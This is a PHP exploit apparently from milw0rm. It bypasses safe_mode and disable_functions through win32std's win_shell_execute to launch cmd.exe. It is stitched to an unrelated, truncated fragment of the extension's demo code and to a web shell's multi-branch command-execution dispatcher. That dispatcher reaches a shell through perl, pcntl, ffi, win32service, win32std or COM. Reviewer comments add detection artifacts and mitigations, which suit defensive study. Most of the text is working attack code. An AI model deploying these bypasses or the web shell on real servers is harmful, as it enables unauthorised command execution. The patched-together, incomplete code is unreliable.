<?php
// PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
// author: shinnai
// mail: shinnai[at]autistici[dot]org
// site: http://shinnai.altervista.org
// Tested on xp Pro sp2 full patched, worked both from the cli and on apache
// Thanks to rgod for all his precious advice :)
// I set php.ini in this way:
// safe_mode = On
// disable_functions = system
// if you launch the exploit from the cli, cmd.exe will be executed
// if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager
//
// Reviewer note (defensive reading): what this PoC demonstrates is that
// disable_functions only blocks the functions listed in it (here: system), and
// that the extension's own process-spawning function, win_shell_execute, evidently
// performed no safe_mode check of its own at the time. Mitigation: do not load
// win32std in a web-facing PHP, or add its spawning functions to disable_functions
// as well; safe_mode was removed in PHP 5.4 and is not a control to rely on.
// Detection: a cmd.exe child process of the PHP/Apache worker, as the author's
// taskmanager observation above already describes.

if (!extension_loaded("win32std")) {
    die("win32std extension required!");
}
// Expected to be refused: system is the one function listed in disable_functions.
system("cmd.exe"); // just to be sure that protections work well
// The extension function is not in disable_functions and is not subject to safe_mode here;
// the relative path walks up to the Windows directory from the script's cwd.
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>
# milw0rm.com [2007-07-24]
function err($txt) { echo "ERROR: " . $txt . "\n"; exit; } /* Message box exemple */ if (win_message_box("Hey !\n\nThis is win32std extension test\n\nAre you realy sure you want to start it ?", MB_YESNO | MB_ICONQUESTION | MB_DEFBUTTON2) != MB_IDYES) { return FALSE; } /* Browse exemple */ $filter = array("HTML File" => "*.htm;*.html", "INI File" => "*.ini", "All file" => "*.*"); echo win_browse_file(1, NULL, 'a_file', 'ext', $filter) . "\n"; echo win_browse_folder(NULL, "Choose a dir") . "\n"; /* Shell execute exemple */ win_shell_execute('c:\\', "find"); /* beep exemple */ if (!win_beep('*')) { echo "Unable to beep !\n"; } else { echo "Bip !\n"; } /* Sound exemple */ if (!win_play_wav("%WINDIR%\\Media\ringin.wav", 1)) { echo "Unable to play sound !\n"; } else { echo "Playing sound !\n"; sleep(1); if (!win_play_wav(NULL)) { echo "Unable to stop playing sound !\n"; } else {
/**
 * Runs a command line through win32std's win_shell_execute and collects its
 * output from a temporary capture file (the extension call itself returns no
 * output; the shell redirection ">" writes it to the file).
 *
 * Defensive notes: the observable artifacts are a cmd.exe child process of the
 * PHP worker whose command line starts with "/C <command> >", and a short-lived
 * file with a uniqid('NJ')-style name in the directory returned by whereistmP()
 * (a helper defined elsewhere in this file). Mitigation: do not load win32std on
 * a web-facing PHP, or list win_shell_execute in disable_functions.
 *
 * @param string $command command line handed to cmd.exe /C (not escaped here)
 * @return string|false contents of the capture file as returned by file_get_contents
 */
function winshelL($command)
{
    // Capture file path: temp directory (helper defined elsewhere) + 'NJ'-prefixed uniqid.
    $name = whereistmP() . "\\" . uniqid('NJ');
    // cmd.exe is asked to run the command and redirect its output into the capture file.
    win_shell_execute('cmd.exe', '', "/C {$command} >\"{$name}\"");
    // Fixed one-second wait before the capture file is read.
    sleep(1);
    $exec = file_get_contents($name);
    // The capture file is removed after reading, so only its transient creation is observable.
    unlink($name);
    return $exec;
}
/**
 * Command-execution dispatcher of a PHP web shell: selects whichever loaded
 * extension can reach a system shell and returns the command's captured output.
 *
 * Reads the globals $win (platform switch: non-Windows when falsy) and $tempdir
 * (prefix for the capture file). The helpers z7r, z9p and z6l are defined
 * elsewhere in this file; from their call sites z7r appears to test whether a
 * function is usable, z9p to read the capture file and z6l to transform the
 * command string — confirm against their definitions.
 *
 * Defensive notes (grounded in the branches below): every path leaves the same
 * classes of artifact — a perl or cmd.exe child process of the PHP worker, a
 * temporary file in $tempdir named with a uniqid prefix of 'pcntl' or 'NJ' that
 * is unlinked after it is read, and, on the win32service branch, a transient
 * Windows service with a uniqid('NJ') name whose binary path is cmd.exe. The
 * pervasive "@" suppression means failures of these calls do not reach the PHP
 * error log. Mitigation: do not load perl, pcntl, ffi, win32service or win32std
 * on a web-facing PHP; list pcntl_*, win32_* and win_shell_execute in
 * disable_functions and COM in disable_classes.
 *
 * @param string $c command to run; an empty value yields an empty result
 * @return string captured output (or a status message on the pcntl branch)
 */
function z6v($c)
{
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            // --- non-Windows paths ---
            if (extension_loaded('perl')) {
                // Perl extension: the command runs inside perl's system(); its
                // output is collected through PHP output buffering.
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                // pcntl: fork, and have the child replace itself with perl -e system(...),
                // redirecting the command's output into the capture file.
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    // Parent: reports based on pcntl_wifexited($status).
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    // Child: tries the two usual perl locations, then dies.
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) {
                        exit(0);
                    }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) {
                        exit(0);
                    }
                    die;
                }
                // Parent continues here: read the capture file and remove it.
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            // --- Windows paths: all write the command's output into $o, then read it with z9p ---
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                // ffi: binds kernel32!WinExec and launches "cmd.exe /c ..." directly;
                // then polls for the capture file with no timeout.
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                // win32service: registers a throwaway service whose binary is cmd.exe,
                // starts/stops/deletes it, then polls for the capture file. Service
                // install/remove events with a uniqid('NJ')-style name are the trace.
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                // win32std: same technique as the standalone PoC at the top of this page
                // (relative path walking up to the Windows directory), then polls for the file.
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } else {
                // Fallback: COM WScript.Shell Run; no polling here, the file is read immediately.
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            // Capture file removed after reading on every Windows branch.
            @unlink($o);
        }
    }
    return $r;
}